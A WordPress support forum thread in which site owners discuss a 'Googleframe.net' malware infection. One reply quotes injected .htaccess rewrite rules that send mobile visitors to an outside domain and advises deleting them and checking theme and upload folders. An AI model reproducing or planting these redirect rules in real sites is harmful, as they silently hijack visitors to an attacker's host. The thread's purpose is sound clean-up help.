Googleframe.net – Malware

  • Does anyone know what to do when Customizer is infected by a malware called Googleframe.net (open a new window from the menu)

    Regards
    Thomas

Viewing 7 replies - 1 through 7 (of 7 total)

  • Did you try Google?

    Thread Starter thomasskjold

    (@thomasskjold)

    Thanks for taking you time to answer.
    Yes ! I have Googled the problem and end up here with different answers I do not understand so well.
    I have tried to malware-scan my Customizer website with different Anti-malware plugins. I have bought access to Site-scanners. But since they only scan once every 24 hours, I haven heard anything yet. So I thought somebody could give an alternative solution ??
    Regards
    Thomas

    Hi thomasskjold,

    I am also having the same issue as you, and dunno what to do.

    The site comes up as clean with all the “big name” malware scanners, and I ran a site security test which came back as “A”.

    I have also been googling for an answer, and I am not coming up with anything. Let’s hope someone can help asap.

    Cheers,

    Alan

    I suggest you both leave your site link here.

    Do you have any security plugins installed? Try iThemes Security or WordFence. Not sure if they’ll help post-infection but may help you analyse what to do.

    Thread Starter thomasskjold

    (@thomasskjold)

    https://www.fanoe-vadehavsfestival.dk
    Using Wordfence. But it doesn’t find anything
    Kind regards
    Thomas

    Hi,
    here’s a solution that worked for me: Go to your folder with WordPress installation and check the .htaccess file

    Mine contained these lines:
    RewriteEngine on
    RewriteCond %{HTTP_ACCEPT} “text/vnd.wap.wml|application/vnd.wap.xhtml+xml” [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} “acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-” [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} “dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-” [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} “maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv” [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} “palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany” [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} “sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo” [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} “teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi” [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} “wapp|wapr|webc|winw|winw|xda|xda-” [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} “up.browser|up.link|windowssce|iemobile|mini|mmp” [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} “symbian|iOS|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android” [NC]
    RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
    RewriteCond %{HTTP_USER_AGENT} !america [NC]
    RewriteCond %{HTTP_USER_AGENT} !avant [NC]
    RewriteCond %{HTTP_USER_AGENT} !download [NC]
    RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
    RewriteRule ^(.*)$ https://6.moby24.com [L,R=302]

    Delete them, check your /wp-content/themes/ and /wp-content/uploads/ directories and delete unwanted files that aren’t part of WordPress or your theme…. In my case there were also malicious folders /wp-system/ or /wp-mail/

    Mine is https://www.scatterlingsofafrica.net and I am also using Wordfence, as well as Bulletproof, and can’t find any anomilies.

    I have checked the htaccess, and don’t see anything.

    Cheers,

    A.

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘Googleframe.net – Malware’ is closed to new replies.